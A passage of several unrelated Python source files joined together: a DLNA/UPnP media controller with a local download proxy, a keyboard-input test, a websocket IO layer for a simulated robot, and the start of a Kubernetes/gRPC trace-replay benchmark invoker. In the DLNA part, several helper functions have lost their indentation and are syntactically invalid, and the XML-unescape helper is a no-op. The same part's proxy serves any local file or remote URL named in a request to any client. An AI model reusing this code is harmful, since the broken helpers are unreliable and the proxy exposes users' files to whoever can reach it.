    request path) to the requesting device, with permissive CORS headers."""

    def log_message(self, format, *args):
        # Silence the default per-request console logging.
        pass

    def log_request(self, code='-', size='-'):
        pass

    def response_success(self):
        """Send a 200 + CORS headers without a body (used for OPTIONS/HEAD)."""
        url = self.path[1:] # replace '/'
        if os.path.exists(url):
            f = open(url)
            content_type = mimetypes.guess_type(url)[0]
        else:
            f = urlopen(url=url)
            if py3:
                content_type = f.getheader("Content-Type")
            else:
                content_type = f.info().getheaders("Content-Type")[0]
        self.send_response(200, "ok")
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
        self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
        self.send_header("Access-Control-Allow-Headers", "Content-Type")
        self.send_header("Content-Type", content_type)
        self.end_headers()

    def do_OPTIONS(self):
        self.response_success()

    def do_HEAD(self):
        self.response_success()

    def do_GET(self):
        """Stream the requested local file or remote url to the client, then
        clear the module-level 'running' flag so runProxy() stops serving."""
        global running
        url = self.path[1:] # replace '/'
        content_type = ''
        if os.path.exists(url):
            f = open(url)
            content_type = mimetypes.guess_type(url)[0]
            size = os.path.getsize(url)
        elif not url or not url.startswith('http'):
            # Not a file and not an absolute url - answer headers only.
            self.response_success()
            return
        else:
            f = urlopen(url=url)
        try:
            if not content_type:
                if py3:
                    content_type = f.getheader("Content-Type")
                    size = f.getheader("Content-Length")
                else:
                    content_type = f.info().getheaders("Content-Type")[0]
                    size = f.info().getheaders("Content-Length")[0]
            self.send_response(200)
            self.send_header('Access-Control-Allow-Origin', '*')
            self.send_header("Content-Type", content_type)
            self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(url)))
            self.send_header("Content-Length", str(size))
            self.end_headers()
            # Copy the whole payload to the client in chunks.
            shutil.copyfileobj(f, self.wfile)
        finally:
            running = False
            f.close()
def runProxy(ip = '', port = 8000):
    """Serve download-proxy requests one at a time until DownloadProxy.do_GET
    clears the module-level 'running' flag (i.e. after a completed transfer)."""
    global running
    running = True
    DownloadProxy.protocol_version = "HTTP/1.0"
    server = HTTPServer((ip, port), DownloadProxy)
    while running:
        server.handle_request()
#
# PROXY
# =================================================================================================
def _get_port(location):
""" Extract port number from url.
location -- string like http://anyurl:port/whatever/path
return -- port number
"""
port = re.findall('http://.*?:(\d+).*', location)
return int(port[0]) if port else 80
def _get_control_url(xml, urn):
    """ Extract the control url for a given service urn from a parsed device
    description.

    xml -- device description dictionary (from _xml2dict)
    urn -- service type urn to look up
    return -- control url, or None when the service is absent
    """
    path = 'root/device/serviceList/service@serviceType={}/controlURL'.format(urn)
    return _xpath(xml, path)
@contextmanager
def _send_udp(to, packet):
""" Send UDP message to group
to -- (host, port) group to send the packet to
packet -- message to send
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.sendto(packet.encode(), to)
yield sock
sock.close()
def _unescape_xml(xml):
""" Replace escaped xml symbols with real ones.
"""
return xml.replace('<', '<').replace('>', '>').replace('"', '"')
def _send_tcp(to, payload):
""" Send TCP message to group
to -- (host, port) group to send to payload to
payload -- message to send
"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(to)
sock.sendall(payload.encode('utf-8'))
data = sock.recv(2048)
if py3:
data = data.decode('utf-8')
data = _xml2dict(_unescape_xml(data), True)
errorDescription = _xpath(data, 's:Envelope/s:Body/s:Fault/detail/UPnPError/errorDescription')
if errorDescription is not None:
logging.error(errorDescription)
except Exception as e:
data = ''
finally:
sock.close()
return data
def _get_location_url(raw):
""" Extract device description url from discovery response
raw -- raw discovery response
return -- location url string
"""
t = re.findall('\n(?i)location:\s*(.*)\r\s*', raw, re.M)
if len(t) > 0:
return t[0]
return ''
def _get_friendly_name(xml):
    """ Extract the human-readable device name from a parsed description.

    xml -- device description dictionary
    return -- device name, or 'Unknown' when missing
    """
    friendly = _xpath(xml, 'root/device/friendlyName')
    if friendly is None:
        return 'Unknown'
    return friendly
def _get_serve_ip(target_ip, target_port=80):
""" Find ip address of network interface used to communicate with target
target-ip -- ip address of target
return -- ip address of interface connected to target
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
my_ip = s.getsockname()[0]
s.close()
return my_ip
class DlnapDevice:
    """ Represents DLNA/UPnP device.

    Constructed from a raw SSDP discovery response: the LOCATION header is
    followed to download and parse the device description XML, from which the
    AVTransport and RenderingControl control urls are extracted.
    """

    def __init__(self, raw, ip):
        self.__logger = logging.getLogger(self.__class__.__name__)
        self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))

        self.ip = ip
        self.ssdp_version = 1

        # Safe defaults in case parsing the description below fails.
        self.port = None
        self.name = 'Unknown'
        self.control_url = None
        self.rendering_control_url = None
        self.has_av_transport = False

        try:
            self.__raw = raw.decode('utf-8')
            self.location = _get_location_url(self.__raw)
            self.__logger.info('location: {}'.format(self.location))

            self.port = _get_port(self.location)
            self.__logger.info('port: {}'.format(self.port))

            # Fetch and parse the device description XML over HTTP.
            raw_desc_xml = urlopen(self.location).read().decode('utf-8')
            self.__desc_xml = _xml2dict(raw_desc_xml)
            self.__logger.debug('description xml: {}'.format(self.__desc_xml))

            self.name = _get_friendly_name(self.__desc_xml)
            self.__logger.info(u'friendlyName: {}'.format(self.name))

            self.control_url = _get_control_url(self.__desc_xml, URN_AVTransport)
            self.__logger.info('control_url: {}'.format(self.control_url))

            self.rendering_control_url = _get_control_url(self.__desc_xml, URN_RenderingControl)
            self.__logger.info('rendering_control_url: {}'.format(self.rendering_control_url))

            self.has_av_transport = self.control_url is not None
            self.__logger.info('=> Initialization completed'.format(ip))
        except Exception as e:
            # Keep the partially-initialized device object; callers check
            # has_av_transport before using it.
            self.__logger.warning('DlnapDevice (ip = {}) init exception:\n{}'.format(ip, traceback.format_exc()))

    def __repr__(self):
        return u'{} @ {}'.format(self.name, self.ip)

    def __eq__(self, d):
        # Devices are considered the same when both name and ip match.
        return self.name == d.name and self.ip == d.ip

    def _payload_from_template(self, action, data, urn):
        """ Assembly payload from template.

        action -- SOAP action name
        data   -- dictionary of XML field name -> value
        urn    -- service urn the action belongs to
        """
        fields = ''
        for tag, value in data.items():
            fields += '<{tag}>{value}</{tag}>'.format(tag=tag, value=value)

        payload = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:{action} xmlns:u="{urn}">
{fields}
</u:{action}>
</s:Body>
</s:Envelope>""".format(action=action, urn=urn, fields=fields)
        return payload

    def _create_packet(self, action, data):
        """ Create packet to send to device control url.

        action -- control action
        data -- dictionary with XML fields value
        """
        # Volume/mute actions go to the RenderingControl service; everything
        # else targets AVTransport.
        if action in ["SetVolume", "SetMute", "GetVolume"]:
            url = self.rendering_control_url
            urn = URN_RenderingControl_Fmt.format(self.ssdp_version)
        else:
            url = self.control_url
            urn = URN_AVTransport_Fmt.format(self.ssdp_version)
        payload = self._payload_from_template(action=action, data=data, urn=urn)

        packet = "\r\n".join([
            'POST {} HTTP/1.1'.format(url),
            'User-Agent: {}/{}'.format(__file__, __version__),
            'Accept: */*',
            'Content-Type: text/xml; charset="utf-8"',
            'HOST: {}:{}'.format(self.ip, self.port),
            'Content-Length: {}'.format(len(payload)),
            'SOAPACTION: "{}#{}"'.format(urn, action),
            'Connection: close',
            '',
            payload,
            ])
        self.__logger.debug(packet)
        return packet

    def set_current_media(self, url, instance_id = 0):
        """ Set media to playback.

        url -- media url
        instance_id -- device instance id
        """
        packet = self._create_packet('SetAVTransportURI', {'InstanceID':instance_id, 'CurrentURI':url, 'CurrentURIMetaData':'' })
        _send_tcp((self.ip, self.port), packet)

    def play(self, instance_id = 0):
        """ Play media that was already set as current.

        instance_id -- device instance id
        """
        packet = self._create_packet('Play', {'InstanceID': instance_id, 'Speed': 1})
        _send_tcp((self.ip, self.port), packet)

    def pause(self, instance_id = 0):
        """ Pause media that is currently playing back.

        instance_id -- device instance id
        """
        packet = self._create_packet('Pause', {'InstanceID': instance_id, 'Speed':1})
        _send_tcp((self.ip, self.port), packet)

    def stop(self, instance_id = 0):
        """ Stop media that is currently playing back.

        instance_id -- device instance id
        """
        packet = self._create_packet('Stop', {'InstanceID': instance_id, 'Speed': 1})
        _send_tcp((self.ip, self.port), packet)

    def seek(self, position, instance_id = 0):
        """ Seek to a playback position.

        position -- target position (REL_TIME format, e.g. '00:01:30')
        instance_id -- device instance id
        """
        packet = self._create_packet('Seek', {'InstanceID':instance_id, 'Unit':'REL_TIME', 'Target': position })
        _send_tcp((self.ip, self.port), packet)

    def volume(self, volume=10, instance_id = 0):
        """ Set the playback volume on the Master channel.

        volume -- desired volume level
        instance_id -- device instance id
        """
        packet = self._create_packet('SetVolume', {'InstanceID': instance_id, 'DesiredVolume': volume, 'Channel': 'Master'})
        _send_tcp((self.ip, self.port), packet)

    def get_volume(self, instance_id = 0):
        """ Query the current volume.

        instance_id -- device instance id
        """
        packet = self._create_packet('GetVolume', {'InstanceID':instance_id, 'Channel': 'Master'})
        _send_tcp((self.ip, self.port), packet)

    def mute(self, instance_id = 0):
        """ Mute the device.

        instance_id -- device instance id
        """
        packet = self._create_packet('SetMute', {'InstanceID': instance_id, 'DesiredMute': '1', 'Channel': 'Master'})
        _send_tcp((self.ip, self.port), packet)

    def unmute(self, instance_id = 0):
        """ Unmute the device.

        instance_id -- device instance id
        """
        packet = self._create_packet('SetMute', {'InstanceID': instance_id, 'DesiredMute': '0', 'Channel': 'Master'})
        _send_tcp((self.ip, self.port), packet)

    def info(self, instance_id=0):
        """ Transport info.

        instance_id -- device instance id
        """
        packet = self._create_packet('GetTransportInfo', {'InstanceID': instance_id})
        return _send_tcp((self.ip, self.port), packet)

    def media_info(self, instance_id=0):
        """ Media info.

        instance_id -- device instance id
        """
        packet = self._create_packet('GetMediaInfo', {'InstanceID': instance_id})
        return _send_tcp((self.ip, self.port), packet)

    def position_info(self, instance_id=0):
        """ Position info.

        instance_id -- device instance id
        """
        packet = self._create_packet('GetPositionInfo', {'InstanceID': instance_id})
        return _send_tcp((self.ip, self.port), packet)

    def set_next(self, url):
        # Not implemented.
        pass

    def next(self):
        # Not implemented.
        pass
def discover(name='', ip='', timeout=1, st=SSDP_ALL, mx=3, ssdp_version=1):
    """Discover UPnP devices on the local network.

    name -- name or part of the name to filter devices
    ip -- known device ip; stop at the first AVTransport-capable match
    timeout -- how long (seconds) to listen for SSDP responses
    st -- st field of the discovery packet (format template)
    mx -- mx field of the discovery packet
    ssdp_version -- protocol version substituted into *st*
    return -- list of DlnapDevice
    """
    st = st.format(ssdp_version)
    payload = "\r\n".join([
        'M-SEARCH * HTTP/1.1',
        'User-Agent: {}/{}'.format(__file__, __version__),
        'HOST: {}:{}'.format(*SSDP_GROUP),
        'Accept: */*',
        'MAN: "ssdp:discover"',
        'ST: {}'.format(st),
        'MX: {}'.format(mx),
        '',
        ''])
    found = []
    with _send_udp(SSDP_GROUP, payload) as sock:
        deadline = time.time() + timeout
        while time.time() <= deadline:
            # Wake up at least once a second so the deadline is honoured.
            readable, _, errored = select.select([sock], [], [sock], 1)
            if sock in readable:
                data, addr = sock.recvfrom(1024)
                if ip and addr[0] != ip:
                    continue  # response from a different host than requested
                dev = DlnapDevice(data, addr[0])
                dev.ssdp_version = ssdp_version
                if dev in found:
                    continue  # duplicate announcement
                if name and name.lower() not in dev.name.lower():
                    continue  # name filter did not match
                if not ip:
                    found.append(dev)
                elif dev.has_av_transport:
                    # Searching by ip: first capable device ends the scan.
                    found.append(dev)
                    break
            elif sock in errored:
                raise Exception('Getting response failed')
            # Nothing readable this round: keep waiting until the deadline.
    return found
#
# Signal of Ctrl+C
# =================================================================================================
def signal_handler(signum, frame):
    """Handle Ctrl+C: announce and terminate with exit status 1."""
    print(' Got Ctrl + C, exit now!')
    sys.exit(1)


signal.signal(signal.SIGINT, signal_handler)
if __name__ == '__main__':
    import getopt

    def usage():
        # Print the command-line help text.
        print('{} [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>] [--pause] [--stop] [--proxy]'.format(__file__))
        print(' --ip <device ip> - ip address for faster access to the known device')
        print(' --device <device name or part of the name> - discover devices with this name as substring')
        print(' --all - flag to discover all upnp devices, not only devices with AVTransport ability')
        print(' --play <url> - set current url for play and start playback it. In case of url is empty - continue playing recent media.')
        print(' --pause - pause current playback')
        print(' --stop - stop current playback')
        print(' --mute - mute playback')
        print(' --unmute - unmute playback')
        print(' --volume <vol> - set current volume for playback')
        print(' --seek <position in HH:MM:SS> - set current position for playback')
        print(' --timeout <seconds> - discover timeout')
        print(' --ssdp-version <version> - discover devices by protocol version, default 1')
        print(' --proxy - use local proxy on proxy port')
        print(' --proxy-port <port number> - proxy port to listen incomming connections from devices, default 8000')
        print(' --help - this help')

    def version():
        # Print the script version.
        print(__version__)

    try:
        opts, args = getopt.getopt(sys.argv[1:], "hvd:t:i:", [  # information arguments
            'help',
            'version',
            'log=',
            # device arguments
            'device=',
            'ip=',
            # action arguments
            'play=',
            'pause',
            'stop',
            'volume=',
            'mute',
            'unmute',
            'seek=',
            # discover arguments
            'list',
            'all',
            'timeout=',
            'ssdp-version=',
            # transport info
            'info',
            'media-info',
            # download proxy
            'proxy',
            'proxy-port='])
    except getopt.GetoptError:
        usage()
        sys.exit(1)

    # Option defaults.
    device = ''
    url = ''
    vol = 10
    position = '00:00:00'
    timeout = 1
    action = ''
    logLevel = logging.WARN
    compatibleOnly = True
    ip = ''
    proxy = False
    proxy_port = 8000
    ssdp_version = 1

    # NOTE(review): several `opt in ('--xxx')` tests below compare against a
    # plain string, not a 1-tuple (missing trailing comma); getopt yields exact
    # option names so the substring semantics happen to work here.
    for opt, arg in opts:
        if opt in ('-h', '--help'):
            usage()
            sys.exit(0)
        elif opt in ('-v', '--version'):
            version()
            sys.exit(0)
        elif opt in ('--log'):
            if arg.lower() == 'debug':
                logLevel = logging.DEBUG
            elif arg.lower() == 'info':
                logLevel = logging.INFO
            elif arg.lower() == 'warn':
                logLevel = logging.WARN
        elif opt in ('--all'):
            compatibleOnly = False
        elif opt in ('-d', '--device'):
            device = arg
        elif opt in ('-t', '--timeout'):
            timeout = float(arg)
        elif opt in ('--ssdp-version'):
            ssdp_version = int(arg)
        elif opt in ('-i', '--ip'):
            # Known-ip mode: search everything, but allow more time.
            ip = arg
            compatibleOnly = False
            timeout = 10
        elif opt in ('--list'):
            action = 'list'
        elif opt in ('--play'):
            action = 'play'
            url = arg
        elif opt in ('--pause'):
            action = 'pause'
        elif opt in ('--stop'):
            action = 'stop'
        elif opt in ('--volume'):
            action = 'volume'
            vol = arg
        elif opt in ('--seek'):
            action = 'seek'
            position = arg
        elif opt in ('--mute'):
            action = 'mute'
        elif opt in ('--unmute'):
            action = 'unmute'
        elif opt in ('--info'):
            action = 'info'
        elif opt in ('--media-info'):
            action = 'media-info'
        elif opt in ('--proxy'):
            proxy = True
        elif opt in ('--proxy-port'):
            proxy_port = int(arg)

    logging.basicConfig(level=logLevel)

    # Discover devices; by default only AVTransport-capable ones.
    st = URN_AVTransport_Fmt if compatibleOnly else SSDP_ALL
    allDevices = discover(name=device, ip=ip, timeout=timeout, st=st, ssdp_version=ssdp_version)
    if not allDevices:
        print('No compatible devices found.')
        sys.exit(1)

    # No action (or --list): just show what was found.
    if action in ('', 'list'):
        print('Discovered devices:')
        for d in allDevices:
            print(u' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))
        sys.exit(0)

    # All actions target the first discovered device.
    d = allDevices[0]
    print(d)

    # Resolve youtube links to a direct media url via youtube-dl.
    if url.lower().replace('https://', '').replace('www.', '').startswith('youtube.'):
        import subprocess
        process = subprocess.Popen(['youtube-dl', '-g', url], stdout = subprocess.PIPE)
        url, err = process.communicate()
        # NOTE(review): communicate() returns bytes on py3, so the
        # startswith('https://') check below would raise TypeError — confirm
        # the youtube path on python 3.
    if url.lower().startswith('https://'):
        proxy = True  # devices often cannot fetch https directly

    # Start the local download proxy when requested (or forced by https).
    if proxy:
        ip = _get_serve_ip(d.ip)
        t = threading.Thread(target=runProxy, kwargs={'ip' : ip, 'port' : proxy_port})
        t.daemon = True
        t.start()
        time.sleep(2)

    # Dispatch the requested action to the device.
    if action == 'play':
        try:
            d.stop()
            url = 'http://{}:{}/{}'.format(ip, proxy_port, url) if proxy else url
            d.set_current_media(url=url)
            d.play()
        except Exception as e:
            print('Device is unable to play media.')
            # NOTE(review): logging.warn is a deprecated alias of logging.warning.
            logging.warn('Play exception:\n{}'.format(traceback.format_exc()))
            sys.exit(1)
    elif action == 'pause':
        d.pause()
    elif action == 'stop':
        d.stop()
    elif action == 'volume':
        d.volume(vol)
    elif action == 'seek':
        d.seek(position)
    elif action == 'mute':
        d.mute()
    elif action == 'unmute':
        d.unmute()
    elif action == 'info':
        print(d.info())
    elif action == 'media-info':
        print(d.media_info())

    # Keep the process alive while the proxy serves the device.
    if proxy:
        while running:
            time.sleep(30)
|
keyboard_controller_test.py
|
#!/usr/bin/env python3
import threading
import queue
class NonBlockingInput:
    """Read console input on a background thread so polling never blocks."""

    def __init__(self, exit_condition):
        """Start the reader thread; it stops once *exit_condition* is typed."""
        self.exit_condition = exit_condition
        self.input_queue = queue.Queue()
        self.input_thread = threading.Thread(target=self.read_kbd_input, args=(), daemon=True)
        self.input_thread.start()

    def read_kbd_input(self):
        """Thread body: forward each input() line to the queue until the exit word."""
        while True:
            line = input()
            self.input_queue.put(line)
            if line.strip() == self.exit_condition:
                break

    def input_queued(self):
        """Return True when at least one line is waiting in the queue."""
        return self.input_queue.qsize() > 0

    def input_get(self):
        """Pop and return the oldest queued line, or '' when nothing is queued."""
        if self.input_queue.qsize() > 0:
            return self.input_queue.get()
        return ""
if __name__ == '__main__':
    # Demo: echo every typed line until the user types 'quit'.
    # Note this is a busy-wait loop; fine for a manual test harness.
    NON_BLOCK_INPUT = NonBlockingInput(exit_condition='quit')
    DONE_PROCESSING = False
    INPUT_STR = ""
    while not DONE_PROCESSING:
        if NON_BLOCK_INPUT.input_queued():
            INPUT_STR = NON_BLOCK_INPUT.input_get()
            if INPUT_STR.strip() == "quit":
                DONE_PROCESSING = True
            else:
                print("{}".format(INPUT_STR))
|
ws.py
|
"""WebSocket IO definition."""
import json
import asyncio
import websockets
import numpy as np
from threading import Thread, Event
from base64 import b64decode
from io import BytesIO
from PIL import Image
from .io import IO
class WsIO(IO):
    """WebSocket IO implementation."""

    # Class-level singleton server, lazily created by shared_server().
    ws = None

    def __init__(self, part_name):
        """Create an io attached to the named part."""
        self.part_name = part_name
        self.motors = []
        self.disks = []

    @classmethod
    def shared_server(cls, part_name):
        """Create a new io registered on the shared ws server (started on demand)."""
        io = cls(part_name)
        if cls.ws is None:
            cls.ws = WsServer()
            cls.ws.run_in_background()
        cls.ws.register(io)
        return io

    def find_module(self, module_name):
        """Get a specific module from the IO.

        Only a 'force_gripper' placeholder is provided, for code compatibility.
        """
        if module_name != 'force_gripper':
            raise NotImplementedError
        sensor = WsFakeForceSensor()
        if self.part_name == 'left_arm.hand':
            self.ws.left_force_sensor = sensor
        elif self.part_name == 'right_arm.hand':
            self.ws.right_force_sensor = sensor
        return sensor

    def find_dxl(self, dxl_name, dxl_config):
        """Get a fake dynamixel motor; only the goal position is used."""
        sign = -1 if dxl_config['orientation'] == 'indirect' else 1
        motor = WsMotor(name=f'{self.part_name}.{dxl_name}',
                        initial_position=dxl_config['offset'] * sign)
        self.motors.append(motor)
        self.ws.motors[motor.name] = motor
        return motor

    def find_fan(self, fan_name):
        """Get a (fake) fan from its name."""
        return FakeFan()

    def find_orbita_disks(self):
        """Get the three fake orbita disks (bottom, middle, top order)."""
        disks = [
            WsFakeOrbitaDisk(name=f'{self.part_name}.{suffix}', initial_position=-60)
            for suffix in ('disk_bottom', 'disk_middle', 'disk_top')
        ]
        self.disks += disks
        return disks

    def find_dual_camera(self, default_camera):
        """Retrieve a dual camera."""
        camera = WsDualCamera(default_camera)
        self.ws.cam = camera
        return camera

    def close(self):
        """Close the WS."""
        self.ws.close()
class WsMotor(object):
    """Motor placeholder synced over the websocket.

    Only the goal position (``target_rot_position``) is actually driven;
    the other attributes exist for API compatibility.
    """

    def __init__(self, name, initial_position):
        """Init the fake motor at *initial_position* (deg.)."""
        self.name = name
        self.compliant = False
        # Both target and present positions start at the initial position.
        self.target_rot_position = initial_position
        self.rot_position = initial_position
        self.temperature = 20
class WsFakeOrbitaDisk(object):
    """Orbita disk placeholder; instantly reaches its target position."""

    def __init__(self, name, initial_position):
        """Create fake Orbita disk starting at *initial_position* (deg.)."""
        self.name = name
        self.compliant = False
        self._target_rot_position = initial_position

    def __repr__(self) -> str:
        """Public Orbita disk string representation."""
        # BUG FIX: the closing quote after the position value was missing.
        return f'<Orbita "{self.name}" pos="{self.rot_position}">'

    def setup(self):
        """Initialize the disk (nothing to do for the fake one)."""
        pass

    @property
    def rot_position(self):
        """Get the current disk angle position (in deg.).

        The fake disk is always exactly at its target.
        """
        return self.target_rot_position

    @property
    def temperature(self):
        """Get the current temperature in C (constant for the fake disk)."""
        return 37.2

    @property
    def target_rot_position(self):
        """Get the current target angle position (in deg.)."""
        return self._target_rot_position

    @target_rot_position.setter
    def target_rot_position(self, new_pos):
        """Set a new target angle position (in deg.)."""
        self._target_rot_position = new_pos
class WsFakeForceSensor(object):
    """Force sensor placeholder.

    The load starts at 0 and is overwritten by the ws sync loop.
    """

    def __init__(self):
        """Init the fake force sensor with no load."""
        self.load = 0
class WsDualCamera(object):
    """Remote camera whose frames arrive through the websocket."""

    def __init__(self, default_camera):
        """Start on *default_camera* with a black placeholder frame."""
        self.set_active(default_camera)
        self.frame = np.zeros((300, 480, 3), dtype=np.uint8)

    @property
    def active_side(self):
        """Return the currently active camera side."""
        return self._side

    def set_active(self, camera_side):
        """Make one of the cameras active ('left' or 'right')."""
        self._side = camera_side

    def read(self):
        """Return (success, latest frame), mimicking the cv2 capture API."""
        return True, self.frame

    def close(self):
        """Close the camera (nothing to release for the remote one)."""
        pass
class WsServer(object):
    """WebSocket server, sync value from the modules with their equivalent from the client."""

    def __init__(self, host='0.0.0.0', port=6171):
        """Prepare the ws server."""
        self.host, self.port = host, port
        self.running = Event()  # set while the sync loop should keep running
        self.parts = []   # registered WsIO parts whose motors/disks get pushed
        self.motors = {}  # motor name -> motor, for applying client positions

    async def sync(self, websocket, path):
        """Sync loop that exchange modules state with the client.

        Pushes the goal positions of all registered motors and disks, then
        applies the client's reply: present positions, the active eye's
        camera frame, and force-sensor loads.
        """
        self.running.set()
        while self.running.is_set():
            if not websocket.open:
                break
            msg = json.dumps({
                'motors': [
                    {'name': m.name, 'goal_position': m.target_rot_position}
                    for m in sum([p.motors for p in self.parts], [])
                ],
                'disks': [
                    {'name': m.name, 'goal_position': m.target_rot_position}
                    for m in sum([p.disks for p in self.parts], [])
                ],
            })
            # NOTE(review): the JSON is sent encoded, i.e. as a binary frame —
            # confirm the client expects bytes rather than a text frame.
            await websocket.send(msg.encode('UTF-8'))
            resp = await websocket.recv()
            state = json.loads(resp)
            if hasattr(self, 'cam'):
                # The client streams the active eye as a base64-encoded JPEG.
                eye = f'{self.cam.active_side}_eye'
                if eye in state:
                    jpeg_data = b64decode(state[eye])
                    self.cam.frame = np.array(Image.open(BytesIO(jpeg_data)))
            for m in state['motors']:
                if m['name'] in self.motors:
                    self.motors[m['name']].rot_position = m['present_position']
            if hasattr(self, 'left_force_sensor') and 'left_force_sensor' in state:
                self.left_force_sensor.load = state['left_force_sensor']
            if hasattr(self, 'right_force_sensor') and 'right_force_sensor' in state:
                self.right_force_sensor.load = state['right_force_sensor']

    def close(self):
        """Stop the sync loop."""
        self.running.clear()
        # self.t only exists after run_in_background() has been called.
        self.t.join()

    def register(self, io):
        """Register a new io (and its module) to be synced."""
        self.parts.append(io)

    def run_forever(self):
        """Run the sync loop forever (blocking; owns its own event loop)."""
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        serve = websockets.serve(self.sync, self.host, self.port)
        loop.run_until_complete(serve)
        loop.run_forever()

    def run_in_background(self):
        """Run the sync loop forever in a daemon thread."""
        self.t = Thread(target=self.run_forever)
        self.t.daemon = True
        self.t.start()
class FakeFan(object):
    """No-op fan module, present only for API consistency."""

    def on(self):
        """Do nothing."""
        pass

    def off(self):
        """Do nothing."""
        pass
|
invoker.py
|
import os
import sys
import grpc
import json
import time
import argparse
from threading import *
from timeit import default_timer as now
from multiprocessing import Process, Manager
from trace_manager import TraceQuery, TraceManager
from kubernetes import config, client
from kubernetes.client import Configuration
from kubernetes.client.api import core_v1_api
import helloworld_pb2
import helloworld_pb2_grpc
# Endpoint file (used when traces are specified)
endpoint_file = 'benchmark_endpoints.txt'
# Limit traces to particular day(s) (between 1 to 14)
# If set to empty list, will process all
filter_days = [1]
def getArgs():
    """Parse the invoker's command-line arguments and return the namespace."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--endpoint', '-e', type=str, required=False,
                        dest='endpoint', default='http://localhost:80',
                        help='Endpoint to query')
    parser.add_argument('--tracedir', '-d', type=str, required=False,
                        dest='tracedir', default=None,
                        help='Path to traces directory. If not specified, will use manually-inputted parameters.')
    parser.add_argument('--minrange', '-q', type=int, required=False,
                        dest='minrange', default=1,
                        help='Minimum range to map traces to (Default: 1)')
    parser.add_argument('--maxrange', '-r', type=int, required=False,
                        dest='maxrange', default=10,
                        help='Maximum range to map traces to (Default: 10)')
    parser.add_argument('--numsec', '-s', type=int, required=False,
                        dest='numsec', default=5,
                        help='Number of seconds to simulate. -1 for all (Default: 5)')
    # BUG FIX: the help text below was a copy-paste of --numsec's help.
    parser.add_argument('--sorttraces', '-u', type=str, required=False,
                        dest='sorttraces', default="default",
                        choices=["mintime", "maxtime", "minmem", "maxmem", "default"],
                        help='Order in which to process traces (Default: default)')
    parser.add_argument('--executiontime', '-t', type=int, required=False,
                        dest='executiontime', default=0,
                        help='Execution time in ms (Default: 0 for skip)')
    parser.add_argument('--objectsize', '-o', type=int, required=False,
                        dest='objectsize', default=0,
                        help='Object size in KB (Default: 0 for skip)')
    parser.add_argument('--memoryallocate', '-m', type=int, required=False,
                        dest='memoryallocate', default=0,
                        help='Memory to allocate in KB (Default: 0 for skip)')
    return parser.parse_args()
# Function for reading in endpoint from file
# Function for reading in endpoints from file
def readEndpoints(path=None):
    """Read benchmark endpoints, one per line.

    path -- file to read; defaults to the module-level *endpoint_file*
            (backward-compatible: existing callers pass no argument).
    Returns the list of stripped lines.

    BUG FIX: uses a context manager so the file is closed even if
    reading raises (the original leaked the handle on error).
    """
    if path is None:
        path = endpoint_file
    with open(path, 'r') as fd:
        return [line.strip() for line in fd]
# Function to monitor how many pods per-function are spun up
# Note that we treat the return_dict as a set
def podMonitorDaemon(return_dict, stop):
    """Poll the cluster once per second, recording every pod name seen.

    return_dict -- shared dict used as a set (pod name -> 1)
    stop -- zero-argument callable; the loop exits after it returns True
    """
    # Get kubernetes client
    config.load_kube_config()
    c = Configuration().get_default_copy()
    Configuration.set_default(c)
    core_v1 = core_v1_api.CoreV1Api()
    while True:
        curr_pods = core_v1.list_namespaced_pod("default")
        for pod in curr_pods.items:
            curr_name = pod.metadata.name
            # Add to dictionary (treating it as a set)
            return_dict[curr_name] = 1
        # Check the stop flag only after a full scan so the last state is captured.
        if stop():
            break
        time.sleep(1)
# Set any of executiontime, objectsize, or memoryallocate to 0 to skip
# Set any of executiontime, objectsize, or memoryallocate to 0 to skip
def queryFunction(functionname, endpoint, executiontime, objectsize, memoryallocate, returndict):
    """Send one gRPC request to *endpoint* and record its end-to-end latency.

    functionname -- key under which the latency (ms) is appended in returndict
    executiontime/objectsize/memoryallocate -- workload knobs; 0 skips the knob
    returndict -- (Manager) dict of functionname -> list of latencies in ms
    """
    with grpc.insecure_channel(endpoint) as channel:
        stub = helloworld_pb2_grpc.GreeterStub(channel)
        inputjson = {}  # Json object to store input
        if executiontime > 0:
            inputjson['executiontime'] = int(executiontime)
        if objectsize > 0:
            inputjson['objectsize'] = int(objectsize)
        if memoryallocate > 0:
            inputjson['memoryallocate'] = int(memoryallocate)
        input_str = json.dumps(inputjson)
        # print('Querying for: %s' % input_str)
        start = now()
        response = stub.SayHello(helloworld_pb2.HelloRequest(name=input_str))
        end = now()
        e2e_time = (end - start) * 1e3  # seconds -> milliseconds
        # With a manager dict, we cannot simply append to the list from within
        # the dictionary: reassignment is required for the proxy to sync.
        next_list = returndict[functionname]
        next_list.append(e2e_time)
        returndict[functionname] = next_list
def runExperiment(queries_to_run, num_sec):
    """Replay *num_sec* seconds of trace queries, one process per invocation.

    queries_to_run -- TraceQuery-like objects with per-second invocation counts
    num_sec -- seconds of the trace to replay; negative means the full trace
    Returns (per-function latencies, set of pod names seen, invocation counts).
    """
    # If num_sec is negative, replay the entire trace.
    if num_sec < 0:
        num_sec = len(queries_to_run[0].invocations)
    # Track total number of times each function is invoked.
    func_invoc_dict = {}
    # Shared dictionaries (written to from worker processes / the daemon).
    manager = Manager()
    daemon_measurement_dict = manager.dict()
    func_measurement_dict = manager.dict()
    # Launch the pod-monitor daemon with a stop flag closure.
    # FIX: Thread.setDaemon() is deprecated; use the daemon keyword instead.
    stop_flag = False
    daemon = Thread(target=podMonitorDaemon,
                    args=(daemon_measurement_dict, lambda: stop_flag),
                    daemon=True)
    daemon.start()
    for i in range(num_sec):
        for q in queries_to_run:
            num_invoc = int(q.invocations[i])
            # Set up both dictionaries at the same time.
            if q.function_name not in func_measurement_dict:
                func_measurement_dict[q.function_name] = []
